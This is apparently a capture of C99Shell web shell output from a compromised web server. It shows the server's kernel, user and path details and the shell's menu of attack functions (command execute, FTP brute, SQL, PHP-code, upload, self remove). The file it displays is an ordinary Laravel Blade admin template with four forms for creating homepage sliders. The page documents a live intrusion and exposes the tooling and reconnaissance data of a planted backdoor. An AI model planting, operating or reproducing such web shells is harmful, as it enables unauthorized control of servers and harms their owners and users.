!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/game.picotech.app/public_html/core/resources/views/back/slider/   drwxr-xr-x
Free 28.85 GB of 117.98 GB (24.45%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     create.blade.php (18.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('master.back')

@section('content')

<div class="container-fluid">

    <!-- Page Heading -->
    <div class="card mb-4">
        <div class="card-body">
            <div class="d-sm-flex align-items-center justify-content-between">
                <h3 class=" mb-0 bc-title"><b>{{ __('Create Slider') }}</b> </h3>
                <a class="btn btn-primary btn-sm" href="{{route('back.slider.index')}}"><i class="fas fa-chevron-left"></i> {{ __('Back') }}</a>
                </div>
        </div>
    </div>

    <!-- Form -->
    <div class="row">

        <div class="col-xl-12 col-lg-12 col-md-12">
            <div class="card o-hidden border-0 shadow-lg">
                <div class="card-body ">
                    <!-- Nested Row within Card Body -->
                    <div class="row justify-content-center">
                        <div class="col-lg-12">

                        </div>
                    </div>
                    <div class="row">
                        <div class="col-lg-12">
                            <ul class="nav nav-pills nav-secondary" id="pills-tab" role="tablist">
                                <li class="nav-item">
                                  <a class="nav-link active" id="pills-home-tab" data-toggle="pill" href="#pills-home" role="tab" aria-controls="pills-home" aria-selected="true">{{ __('Home 1') }}</a>
                                </li>
                                <li class="nav-item">
                                  <a class="nav-link" id="pills-profile-tab" data-toggle="pill" href="#pills-profile" role="tab" aria-controls="pills-profile" aria-selected="false">{{ __('Home 2') }}</a>
                                </li>
                                <li class="nav-item">
                                  <a class="nav-link" id="pills-contact-tab" data-toggle="pill" href="#pills-contact" role="tab" aria-controls="pills-contact" aria-selected="false">{{ __('Home 3') }}</a>
                                </li>
                                <li class="nav-item">
                                  <a class="nav-link" id="pills-home4-tab" data-toggle="pill" href="#pills-home4" role="tab" aria-controls="pills-home4" aria-selected="false">{{ __('Home 4') }}</a>
                                </li>
                              </ul>
                              <div class="tab-content" id="pills-tabContent">
                                <div class="tab-pane fade show active" id="pills-home" role="tabpanel" aria-labelledby="pills-home-tab">
                                    <form  action="{{ route('back.slider.store') }}" method="POST"
                                        enctype="multipart/form-data">

                                        @csrf
                                        <input type="hidden" name="home_page" value="theme1" id="">
                                        @include('alerts.alerts')
                                        <div class="form-group">
                                            <label id="change_label" for="name">{{ __('Brand Logo') }} </label>
                                            <br>
                                                <img class="admin-img" src="{{  asset('assets/images/placeholder.png') }}"
                                                    alt="No Image Found">
                                            <br>
                                            <span id="change_message" class="mt-1">{{ __('Image Size Should Be 130 x 40') }}</span>
                                        </div>

                                        <div class="form-group position-relative">
                                            <label class="file">
                                                <input type="file"  accept="image/*"  class="upload-photo" name="logo" id="file"
                                                    aria-label="File browser example" >
                                                <span class="file-custom text-left">{{ __('Upload Image...') }}</span>
                                            </label>
                                        </div>

                                        <div class="form-group">
                                            <label for="title">{{ __('Title') }} *</label>
                                            <input type="text" name="title" class="form-control" id="title"
                                                placeholder="{{ __('Enter Title') }}" value="{{ old('title') }}" >
                                        </div>

                                        <div class="form-group">
                                            <label for="slider-link">{{ __('Link') }} *</label>
                                            <input type="text" name="link" class="form-control" id="slider-link"
                                                placeholder="{{ __('Enter Link') }}" value="{{ old('link') }}" >
                                        </div>

                                        <div class="form-group">
                                            <label for="details">{{ __('Details') }} *</label>
                                            <textarea name="details" id="details" class="form-control" rows="5"
                                                placeholder="{{ __('Enter Details') }}"
                                                ></textarea>
                                        </div>

                                        <div class="form-group">
                                            <label id="slider_text"  for="name">{{ __('Set Slider Image') }} *</label>
                                            <br>
                                                <img class="admin-img" src="{{  asset('assets/images/placeholder.png') }}"
                                                    alt="No Image Found">
                                            <br>
                                            <span id="chenge_label2" class="mt-1">{{ __('Image Size Should Be 968 x 530 ') }}</span>
                                        </div>

                                        <div class="form-group position-relative ">
                                            <label class="file">
                                                <input type="file"  accept="image/*"  class="upload-photo" name="photo" id="file"
                                                    aria-label="File browser example" >
                                                <span class="file-custom text-left">{{ __('Upload Image...') }}</span>
                                            </label>
                                        </div>

                                        <div class="form-group">
                                            <button type="submit"
                                                class="btn btn-secondary ">{{ __('Submit') }}</button>
                                        </div>

                                    </form>
                                </div>
                                <div class="tab-pane fade" id="pills-profile" role="tabpanel" aria-labelledby="pills-profile-tab">
                                    <form  action="{{ route('back.slider.store') }}" method="POST"
                                        enctype="multipart/form-data">

                                        @csrf
                                        <input type="hidden" name="home_page" value="theme2" id="">
                                        @include('alerts.alerts')
                                        <div class="form-group">
                                            <label id="change_label" for="name">{{ __('Brand Logo') }} </label>
                                            <br>
                                                <img class="admin-img" src="{{  asset('assets/images/placeholder.png') }}"
                                                    alt="No Image Found">
                                            <br>
                                            <span id="change_message" class="mt-1">{{ __('Image Size Should Be 130 x 40') }}</span>
                                        </div>

                                        <div class="form-group position-relative">
                                            <label class="file">
                                                <input type="file"  accept="image/*"  class="upload-photo" name="logo" id="file"
                                                    aria-label="File browser example" >
                                                <span class="file-custom text-left">{{ __('Upload Image...') }}</span>
                                            </label>
                                        </div>

                                        <div class="form-group">
                                            <label for="title">{{ __('Title') }} *</label>
                                            <input type="text" name="title" class="form-control" id="title"
                                                placeholder="{{ __('Enter Title') }}" value="{{ old('title') }}" >
                                        </div>

                                        <div class="form-group">
                                            <label for="slider-link">{{ __('Link') }} *</label>
                                            <input type="text" name="link" class="form-control" id="slider-link"
                                                placeholder="{{ __('Enter Link') }}" value="{{ old('link') }}" >
                                        </div>

                                        <div class="form-group">
                                            <label for="details">{{ __('Details') }} *</label>
                                            <textarea name="details" id="details" class="form-control" rows="5"
                                                placeholder="{{ __('Enter Details') }}"
                                                ></textarea>
                                        </div>

                                        <div class="form-group">
                                            <label id="slider_text"  for="name">{{ __('Set Slider Image') }} *</label>
                                            <br>
                                                <img class="admin-img" src="{{  asset('assets/images/placeholder.png') }}"
                                                    alt="No Image Found">
                                            <br>
                                            <span id="chenge_label2" class="mt-1">{{ __('Image Size Should Be 1296 x 530 ') }}</span>
                                        </div>

                                        <div class="form-group position-relative ">
                                            <label class="file">
                                                <input type="file"  accept="image/*"  class="upload-photo" name="photo" id="file"
                                                    aria-label="File browser example" >
                                                <span class="file-custom text-left">{{ __('Upload Image...') }}</span>
                                            </label>
                                        </div>

                                        <div class="form-group">
                                            <button type="submit"
                                                class="btn btn-secondary ">{{ __('Submit') }}</button>
                                        </div>

                                    </form>
                                </div>
                                <div class="tab-pane fade" id="pills-contact" role="tabpanel" aria-labelledby="pills-contact-tab">
                                    <form  action="{{ route('back.slider.store') }}" method="POST"
                                        enctype="multipart/form-data">

                                        @csrf
                                        <input type="hidden" name="home_page" value="theme3" id="">
                                        @include('alerts.alerts')
                                        <div class="form-group">
                                            <label id="change_label" for="name">{{ __('Feature Image') }} </label>
                                            <br>
                                                <img class="admin-img" src="{{  asset('assets/images/placeholder.png') }}"
                                                    alt="No Image Found">
                                            <br>
                                            <span id="change_message" class="mt-1">{{ __('Image Size Should Be 320 x 320') }}</span>
                                        </div>

                                        <div class="form-group position-relative">
                                            <label class="file">
                                                <input type="file"  accept="image/*"  class="upload-photo" name="logo" id="file"
                                                    aria-label="File browser example" >
                                                <span class="file-custom text-left">{{ __('Upload Image...') }}</span>
                                            </label>
                                        </div>

                                        <div class="form-group">
                                            <label for="title">{{ __('Title') }} *</label>
                                            <input type="text" name="title" class="form-control" id="title"
                                                placeholder="{{ __('Enter Title') }}" value="{{ old('title') }}" >
                                        </div>

                                        <div class="form-group">
                                            <label for="slider-link">{{ __('Link') }} *</label>
                                            <input type="text" name="link" class="form-control" id="slider-link"
                                                placeholder="{{ __('Enter Link') }}" value="{{ old('link') }}" >
                                        </div>

                                        <div class="form-group">
                                            <label for="details">{{ __('Details') }} *</label>
                                            <textarea name="details" id="details" class="form-control" rows="5"
                                                placeholder="{{ __('Enter Details') }}"
                                                ></textarea>
                                        </div>

                                        <div class="form-group">
                                            <label id="slider_text"  for="name">{{ __('Set Slider Image') }} *</label>
                                            <br>
                                                <img class="admin-img" src="{{  asset('assets/images/placeholder.png') }}"
                                                    alt="No Image Found">
                                            <br>
                                            <span id="chenge_label2" class="mt-1">{{ __('Image Size Should Be 1903 x 570 ') }}</span>
                                        </div>

                                        <div class="form-group position-relative ">
                                            <label class="file">
                                                <input type="file"  accept="image/*"  class="upload-photo" name="photo" id="file"
                                                    aria-label="File browser example" >
                                                <span class="file-custom text-left">{{ __('Upload Image...') }}</span>
                                            </label>
                                        </div>

                                        <div class="form-group">
                                            <button type="submit"
                                                class="btn btn-secondary ">{{ __('Submit') }}</button>
                                        </div>

                                    </form>
                                </div>
                                <div class="tab-pane fade" id="pills-home4" role="tabpanel" aria-labelledby="pills-home4-tab"><form  action="{{ route('back.slider.store') }}" method="POST"
                                    enctype="multipart/form-data">

                                    @csrf

                                    @include('alerts.alerts')

                                    <input type="hidden" name="home_page" value="theme4" id="">
                                    <input type="hidden" name="title" class="form-control" id="title"
                                    placeholder="{{ __('Enter Title') }}" value="theme 4" >

                                    <div class="form-group">
                                        <label for="slider-link">{{ __('Link') }} *</label>
                                        <input type="text" name="link" class="form-control" id="slider-link"
                                            placeholder="{{ __('Enter Link') }}" value="{{ old('link') }}" >
                                    </div>

                                    <input name="details" type="hidden" id="details" value="theme4" class="form-control" rows="5"
                                    placeholder="{{ __('Enter Details') }}"
                                    >

                                    <div class="form-group">
                                        <label id="slider_text"  for="name">{{ __('Set Slider Image') }} *</label>
                                        <br>
                                            <img class="admin-img" src="{{  asset('assets/images/placeholder.png') }}"
                                                alt="No Image Found">
                                        <br>
                                        <span id="chenge_label2" class="mt-1">{{ __('Image Size Should Be 1000 x 530 ') }}</span>
                                    </div>

                                    <div class="form-group position-relative ">
                                        <label class="file">
                                            <input type="file"  accept="image/*"  class="upload-photo" name="photo" id="file"
                                                aria-label="File browser example" >
                                            <span class="file-custom text-left">{{ __('Upload Image...') }}</span>
                                        </label>
                                    </div>

                                    <div class="form-group">
                                        <button type="submit"
                                            class="btn btn-secondary ">{{ __('Submit') }}</button>
                                    </div>

                                </form></div>
                              </div>
                        </div>
                    </div>

            </div>

        </div>

    </div>

</div>

@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.005 ]--